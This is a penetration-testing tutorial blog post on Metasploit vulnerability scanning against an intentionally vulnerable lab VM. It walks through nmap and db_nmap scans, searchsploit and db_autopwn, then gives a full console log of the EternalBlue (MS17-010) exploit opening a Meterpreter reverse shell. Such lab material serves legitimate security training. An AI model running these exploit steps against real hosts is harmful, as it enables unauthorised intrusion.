Vulnerability Scanning With MSF

Posted by r3kind1e on January 8, 2023

Vulnerability Scanning

Vulnerability scanning & detection is the process of scanning a target for vulnerabilities and verifying whether they can be exploited.

So far, we have been able to identify and exploit misconfigurations on target systems. In this section, however, we will explore how to use auxiliary and exploit modules to scan for and identify inherent vulnerabilities in services, operating systems and web applications.

This information will come in handy during the exploitation phase of this course.

We will also look at third-party vulnerability scanning tools such as Nessus, and at how Nessus functionality can be integrated into the MSF.

Lab Environment

For the purposes of demonstrating the vulnerability scanning process, we will be utilizing an intentionally vulnerable virtual machine called Metasploitable3 that is based on Windows Server 2008.

Metasploitable3 was developed by Rapid7 to demonstrate how MSF can be used to perform exploitation of a Windows System.

Instruction on how this VM can be setup can be found here: https://bit.ly/3kASwns

Video

Detect active hosts on the network:

-sn: ping scan only (host discovery, no port scan).

```
sudo nmap -sn 10.10.10.1/24
ip a s
eth0: 10.10.10.5/24
```

The target IP is 10.10.10.4.

Ensure that the PostgreSQL database service is started.

```
msfconsole
```

Verify that the database is connected.

```
db_status
```

Set RHOSTS and RHOST as global variables so that every module we load picks up the target automatically.

```
setg RHOSTS 10.10.10.4
setg RHOST 10.10.10.4
```

Service Version.

db_nmap: this will allow us to perform an Nmap scan within the Metasploit Framework console, and it will automatically import the results into the Metasploit Framework database.

Set up a workspace first; it keeps the results and hosts of this engagement separate from everything else in the database.

```
workspace -a MS3
```

-sS: Perform a SYN scan.

-sV: Perform service version detection.

-O: Perform operating system detection.

All the results of the Nmap scan will be added to the Metasploit Framework database, so that we can refer back to them whenever we want.

```
db_nmap -sS -sV -O 10.10.10.4
```

```
hosts
```

Display all the services and the respective open ports.

```
services
```

How do we utilize this particular service information to find and identify vulnerabilities?

The first thing we can do is take the exact service version reported by the scan and search for exploit modules that match it.

```
search type:exploit name:Microsoft IIS
search type:exploit name:MySQL 5.5
search Sun GlassFish
```

How do we check whether this particular exploit module will work against the open-source version of GlassFish 4.0? Load the module, read its description with `info`, then inspect its options.

```
use exploit/multi/http/glassfish_deployer
info
set payload windows/meterpreter/reverse_tcp
show options
```

Check which option values need to be changed, referring back to the services table:

```
services
```

This is how you would identify an exploit module through the service version. This is just manual vulnerability scanning.

```
back
```

Explore the services table again.

```
services
```

The SMB exploit for Windows Server 2008 R2.

Utilize the MSFconsole search utility. Alternatively, we can also use an inbuilt utility that is part of Kali Linux called searchsploit. Searchsploit is a command-line utility that allows you to search the Exploit-DB database for exploits, and we can then limit the results to only show Metasploit exploits.

searchsploit will bring up exploit code that is not available within the MSFconsole as well as MSF modules, so we want to limit the results to only the MSF exploit modules.

We’ll try and find exploits for Microsoft Windows SMB.

```
searchsploit "Microsoft Windows SMB"
```

The way to distinguish standalone exploit code from Metasploit modules is that, right beside the name, there will be a bracket with the word Metasploit inside it, i.e. (Metasploit). That means there is a Metasploit module available for this particular exploit.

Let's limit the results to only the Metasploit modules. Pipe the output into grep; the pattern is matched case-sensitively, so it picks up exactly the (Metasploit) tag.

```
searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
```

Take a look at this particular exploit; it works on Windows Server 2008 R2.

```
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
```

The MSF already has a module for this particular exploit.

```
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
```

```
search eternalblue
```

```
use auxiliary/scanner/smb/smb_ms17_010
show options
run
```

```
use exploit/windows/smb/ms17_010_eternalblue
show options
run
meterpreter > sysinfo
meterpreter > exit
```

The next technique that I want to highlight is the db_autopwn plugin. This is an extremely useful plugin for the MSF.

hahwul/metasploit-autopwn

It is used to identify exploit modules for the ports that are currently open on a target system. It does this by looking at the services recorded in your database for the hosts you have scanned, and then listing the exploit modules that can be used against each of those services.

```
cd Downloads/
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
ls
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins
```

```
load db_autopwn
db_autopwn
```

This interacts directly with the MSF database, and will only work if your scan results or service information are already in the MSF database. So I really recommend that you start by enumerating all of the information so that it is stored in the database; you can do that either through Nmap or through the auxiliary modules.

```
-p          Select modules based on open ports
-t          Show all matching exploit modules
```

If we just run it as is, you’ll see that it’ll actually enumerate quite a lot of modules. It’s enumerating exploits for each of the open ports. It’s not specific because it’s not utilizing the service version.

In order to make this more streamlined or to narrow down our search, we can target specific ports or specific services.

```
db_autopwn -p -t
```

-PI: lets us specify the port range to match on. Here we target the SMB port, which is port 445.

```
-PI [range] Only exploit hosts with these ports open
```

```
db_autopwn -p -t -PI 445
```

However, it also gives us exploit modules for Samba, the open-source SMB implementation used on Linux and other Unix-like systems, while in our case we are targeting a Windows box.

It also lists all the SMB exploits for Windows. The next step would be to research the target operating system and the vulnerabilities that specific version of SMB suffers from, and then find the appropriate exploit module to use.

In our case, we already know that the EternalBlue exploit works.

This can be very helpful when trying to limit your search for exploits or to perform vulnerabilities scanning with the MSF.

You can also limit the port to port 21.

```
db_autopwn -p -t -PI 21
```
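Because db_autopwn -p matches on open ports alone, a Windows host with 445/tcp open is paired with Samba modules for Linux, FreeBSD, macOS and Solaris as well. The following Python helper is an added example (my own, not part of the original post or of the db_autopwn plugin) that reads the os_name column of the msfconsole `hosts` table together with the plugin's "(port match)" lines and drops the modules whose platform tree contradicts the fingerprint; the embedded sample is a constructed subset of the output shown on this page.

```python
"""Triage db_autopwn port matches against the target's OS fingerprint.

db_autopwn -p pairs modules with hosts purely on open ports, so a Windows
box with 445/tcp open is matched with Samba modules for Linux, FreeBSD,
macOS and Solaris too. This helper (added example) reads the os_name column
of the msfconsole `hosts` table and the plugin's "(port match)" lines and
keeps only modules whose platform tree is consistent with the fingerprint.
"""
import re
from collections import defaultdict

# Constructed sample: the `hosts` table as printed by msfconsole.
HOSTS_TABLE = """\
address          mac                name  os_name    os_flavor  os_sp  purpose  info  comments
-------          ---                ----  -------    ---------  -----  -------  ----  --------
192.168.248.133  00:0c:29:f7:9e:3f        Windows 7                    client
"""

# Constructed sample: a subset of `db_autopwn -p -t -PI 445` output.
AUTOPWN_OUTPUT = """\
[*] Analysis completed in 16 seconds (0 vulns / 0 refs)
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.248.133:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/is_known_pipename  (port match)
[*]   192.168.248.133:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.248.133:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.248.133:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms17_010_eternalblue  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/psexec  (port match)
[*] ================================================================================
"""

MATCH_RE = re.compile(
    r"^\[\*\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+"
    r"(?P<module>exploit/\S+)\s+\((?P<reason>[^)]+)\)\s*$"
)
PLATFORM_RE = re.compile(r"^exploit/(?P<platform>[^/]+)/")
PORTABLE = {"multi"}  # module trees that are not tied to one OS


def parse_hosts_table(text):
    """Map address -> os_name. Cells may be empty, so columns are sliced
    at the offsets of the header words rather than split on whitespace."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0]
    start, end = header.index("os_name"), header.index("os_flavor")
    os_by_host = {}
    for row in lines[2:]:  # skip the header and its dashed underline
        os_by_host[row.split()[0]] = row[start:end].strip()
    return os_by_host


def os_platform(os_name):
    """Map an MSF os_name string onto the module tree it corresponds to."""
    name = os_name.lower()
    for platform in ("windows", "linux", "freebsd", "osx", "solaris", "netware"):
        if platform in name:
            return platform
    return None  # unknown fingerprint: nothing justifies dropping modules


def parse_autopwn(text):
    """Yield (host, port, module, reason) for each db_autopwn match line."""
    for line in text.splitlines():
        m = MATCH_RE.match(line)
        if m:
            yield m["host"], int(m["port"]), m["module"], m["reason"]


def filter_candidates(autopwn_text, hosts_text):
    """Return {(host, port): [module, ...]} keeping only modules whose
    platform tree matches the host's fingerprint or is portable (multi/)."""
    os_by_host = parse_hosts_table(hosts_text)
    kept = defaultdict(list)
    for host, port, module, _reason in parse_autopwn(autopwn_text):
        platform = PLATFORM_RE.match(module)["platform"]
        target = os_platform(os_by_host.get(host, ""))
        if target is None or platform == target or platform in PORTABLE:
            kept[(host, port)].append(module)
    return dict(kept)


if __name__ == "__main__":
    for (host, port), modules in filter_candidates(AUTOPWN_OUTPUT, HOSTS_TABLE).items():
        print(f"{host}:{port} -> {len(modules)} platform-consistent candidate(s)")
        for module in modules:
            print("   ", module)
```

On the sample above the five Samba modules for other platforms are dropped and the multi/ and windows/ candidates remain, which is the short list the text says you should research further.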

Finally, we can make use of the analyze command.

The analyze command examines the contents of the MSF database (your hosts and services) and then provides a list of the vulnerabilities those particular services suffer from and the exploit modules that can be tested against them.

```
analyze
```

vulns: lists the vulnerabilities recorded in the database; here it shows that the scanner detected a vulnerability for SMB.

```
vulns
```
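The References column of the vulns table wraps at the terminal width, so a single record spans several lines and URLs are cut mid-string. The following Python parser is an added example (my own, not part of the original post) that rejoins the wrapped cells and splits the references by type (CVE, MSB, URL, EDB) so a finding can be matched against patch records; the sample is constructed from the vulns output recorded in the Home Lab section of this page.

```python
"""Parse the msfconsole `vulns` table, rejoining wrapped reference cells.

msfconsole wraps the References column at the terminal width, so one
record spans several lines and a reference such as a URL is cut
mid-string. This helper (added example) rejoins those continuation
lines and splits the references by type so a finding can be matched
against patch records or a vulnerability tracker.
"""
import re
from collections import defaultdict

# Constructed sample, wrapped the way msfconsole printed it on this page.
VULNS_OUTPUT = """\
Vulnerabilities
===============

Timestamp                Host             Name                        References
---------                ----             ----                        ----------
2023-01-08 13:38:28 UTC  192.168.248.133  MS17-010 SMB RCE Detection  CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148,MSB-MS17-010,URL-https://zerosum0
                                                                      x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html,URL-https://github.com/countercept/doublepulsar-d
                                                                      etection-script,URL-https://web.archive.org/web/20170513050203/https://technet.microsoft.com/en-us/library/security/m
                                                                      s17-010.aspx,URL-https://github.com/RiskSense-Ops/MS17-010,URL-https://risksense.com/wp-content/uploads/2018/05/White
                                                                      -Paper_Eternal-Blue.pdf,EDB-42030
"""

# A record line: timestamp, host, name (may contain single spaces) and the
# first chunk of references; columns are separated by two or more spaces.
RECORD_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d \S+)\s{2,}"
    r"(?P<host>\S+)\s{2,}(?P<name>.+?)\s{2,}(?P<refs>\S+)\s*$"
)
# A continuation line is indented and carries only wrapped reference text.
CONT_RE = re.compile(r"^\s+(?P<chunk>\S+)\s*$")


def split_references(joined):
    """Split 'CVE-2017-0143,MSB-MS17-010,URL-https://...' into {type: [values]}.
    Only the first '-' separates type from value, so dashes inside CVE ids,
    bulletin ids and URLs are preserved."""
    refs = defaultdict(list)
    for item in filter(None, joined.split(",")):
        kind, _, value = item.partition("-")
        refs[kind].append(value)
    return dict(refs)


def parse_vulns(text):
    """Return [{timestamp, host, name, refs}] for every row of a vulns table."""
    records = []
    chunks = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            if records:  # close the previous record before starting a new one
                records[-1]["refs"] = split_references("".join(chunks))
            records.append({"timestamp": m["ts"], "host": m["host"], "name": m["name"]})
            chunks = [m["refs"]]
            continue
        c = CONT_RE.match(line)
        if c and records:
            # The wrap cut a token in half, so join with no separator.
            chunks.append(c["chunk"])
    if records:
        records[-1]["refs"] = split_references("".join(chunks))
    return records


def cve_ids(record):
    """Full CVE identifiers for one record, e.g. for a patch-status lookup."""
    return ["CVE-" + value for value in record["refs"].get("CVE", [])]


if __name__ == "__main__":
    for rec in parse_vulns(VULNS_OUTPUT):
        print(rec["host"], rec["name"])
        for kind, values in rec["refs"].items():
            print(f"  {kind}: {len(values)} reference(s)")
        print("  CVEs:", ", ".join(cve_ids(rec)))
```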

This is how to perform vulnerability scanning with the MSF and how to utilize the various auxiliary and exploit modules to test whether a particular service is vulnerable to an exploit or not.

```
services
searchsploit "Apache Tomcat/Coyote JSP engine 1.1"
```

Home Lab

Environment: Windows Server 2008 R2

```
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.248.148  netmask 255.255.255.0  broadcast 192.168.248.255
        inet6 fe80::20c:29ff:feaf:2b2a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:af:2b:2a  txqueuelen 1000  (Ethernet)
```
```
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.248.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 08:12 EST
Nmap scan report for 192.168.248.1
Host is up (0.00039s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.248.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:AC:04 (VMware)
Nmap scan report for 192.168.248.133
Host is up (0.00035s latency).
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Nmap scan report for 192.168.248.254
Host is up (0.000086s latency).
MAC Address: 00:50:56:E5:CA:A0 (VMware)
Nmap scan report for 192.168.248.148
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
```

Target: 192.168.248.133

```
┌──(root㉿kali)-[~]
└─# service postgresql start

┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
```
```
msf6 > setg RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 > setg RHOST 192.168.248.133
RHOST => 192.168.248.133
```

```
msf6 > workspace -a MSF3
[*] Added workspace: MSF3
[*] Workspace: MSF3
```
```
msf6 > db_nmap -sS -sV -O 192.168.248.133
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 08:18 EST
[*] Nmap: Nmap scan report for 192.168.248.133
[*] Nmap: Host is up (0.00033s latency).
[*] Nmap: Not shown: 989 closed tcp ports (reset)
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 135/tcp   open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp  open  tcpwrapped
[*] Nmap: 49152/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49155/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49156/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49157/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc        Microsoft Windows RPC
[*] Nmap: MAC Address: 00:0C:29:F7:9E:3F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows 7|2008|8.1
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
[*] Nmap: OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 85.44 seconds
```
```
msf6 > hosts

Hosts
=====

address          mac                name  os_name    os_flavor  os_sp  purpose  info  comments
-------          ---                ----  -------    ---------  -----  -------  ----  --------
192.168.248.133  00:0c:29:f7:9e:3f        Windows 7                    client
```

```
msf6 > services
Services
========

host             port   proto  name          state  info
----             ----   -----  ----          -----  ----
192.168.248.133  135    tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  139    tcp    netbios-ssn   open   Microsoft Windows netbios-ssn
192.168.248.133  445    tcp    microsoft-ds  open   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
192.168.248.133  3389   tcp    tcpwrapped    open
192.168.248.133  49152  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49153  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49154  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49155  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49156  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49157  tcp    msrpc         open   Microsoft Windows RPC
192.168.248.133  49158  tcp    msrpc         open   Microsoft Windows RPC
```
```
┌──(root㉿kali)-[~]
└─# searchsploit "Microsoft Windows SMB"
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                             |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                                                                              | windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                            | windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service                                                                                                             | windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                  | windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)                                                                                         | windows/dos/1065.c
Microsoft Windows - 'SMBGhost' Remote Code Execution                                                                                                       | windows/remote/48537.py
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)                                                                                      | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                                               | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)                                                  | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)                                                                | windows/dos/6463.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)                                                                            | windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)                                                                                                   | windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)                                                                                       | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                              | windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service                                                                              | windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)                                                                                                       | windows/remote/7125.txt
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)                                               | windows/dos/48216.md
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation                                          | windows/local/48267.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC)                                                                                                            | windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation                                                                | windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow                                                                                             | windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution                                                                                     | windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution                                                                                              | windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                           | windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                                                                            | windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                       | windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service                                                                           | windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                 | windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal                                                                              | windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client                                                              | windows/remote/19197.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                              | windows_x86-64/remote/41987.py
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation                                                              | windows/dos/43517.txt
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)                                                       | windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)                                                                             | windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)                                                                  | windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)                                                                  | windows/dos/21747.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```

```
┌──(root㉿kali)-[~]
└─# searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                            | windows/remote/16366.rb
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                  | windows/remote/43970.rb
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)                                                  | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)                                                                | windows/dos/6463.rb
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)                                                                                       | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                              | windows/dos/41891.rb
```

```
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
```

```
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
```
```
msf6 > search EternalBlue

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
```

```
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.248.133:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

```
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.133:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.133:445   - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445   - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.133:445 - The target is vulnerable.
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.248.133:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020  37 36 30 30                                      7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.133
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.133:49170) at 2023-01-08 08:40:10 -0500

meterpreter > sysinfo
Computer        : WIN-4QCPUB6FIVL
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.248.133 - Meterpreter session 1 closed.  Reason: User exit
```
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_autopwn
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
```

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_autopwn -p -t -PI 445
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] Analysis completed in 16 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.248.133:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/is_known_pipename  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/setinfopolicy_heap  (port match)
[*]   192.168.248.133:445  exploit/linux/samba/trans2open  (port match)
[*]   192.168.248.133:445  exploit/multi/samba/nttrans  (port match)
[*]   192.168.248.133:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.248.133:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.248.133:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.248.133:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.248.133:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.248.133:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.248.133:445  exploit/windows/dcerpc/cve_2021_1675_printnightmare  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/cve_2020_0796_smbghost  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ipass_pipe_exec  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms04_031_netdde  (port match)
